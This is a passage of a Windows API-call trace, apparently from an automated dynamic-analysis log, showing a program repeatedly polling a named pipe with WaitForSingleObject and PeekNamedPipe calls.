1 [0068.946] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0068.977] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0068.977] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0069.010] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.010] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0069.040] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.040] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0069.071] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.071] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0069.102] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.102] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0069.134] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.134] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0069.164] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.164] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0069.196] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.196] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0069.234] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.235] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0069.258] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.258] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0069.289] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.289] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0069.321] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.322] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0069.352] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.352] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0069.383] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.383] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0069.414] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.414] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0069.446] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.446] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0069.476] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.476] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0069.508] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.508] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0069.539] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.539] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0069.570] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.570] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0069.601] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.601] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0069.632] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.632] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0069.664] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.664] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0069.695] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.695] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0069.728] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.728] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0069.762] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.762] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0069.790] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.790] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0069.820] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.820] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0069.851] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.851] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0069.882] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.882] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0069.914] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.914] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0069.944] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.945] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0069.976] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0069.976] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0070.007] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0070.007] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0070.038] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0070.038] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0070.069] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0070.069] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0070.102] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0070.102] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0070.132] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0070.132] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0070.163] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0070.163] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0070.194] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0070.194] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0070.239] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0070.239] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0070.257] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0070.257] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0070.287] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0070.288] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0070.319] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0070.319] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0070.350] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0070.350] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0070.381] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0070.381] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0070.825] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0070.825] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0070.850] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0070.850] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0070.880] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0070.880] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0070.912] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0070.912] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0070.950] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0070.950] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0070.975] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0070.975] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0071.005] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0071.005] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0071.037] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0071.037] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0071.068] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0071.068] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0071.099] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0071.099] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0073.729] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0073.730] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0073.870] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0073.870] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0075.497] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0075.497] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0075.573] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0075.574] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0075.669] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0075.669] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0075.685] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0075.685] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0075.716] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0075.716] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0075.748] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0075.748] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0075.779] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0075.779] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0075.810] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0075.810] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0075.842] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0075.842] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0075.873] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0075.873] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0075.904] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, 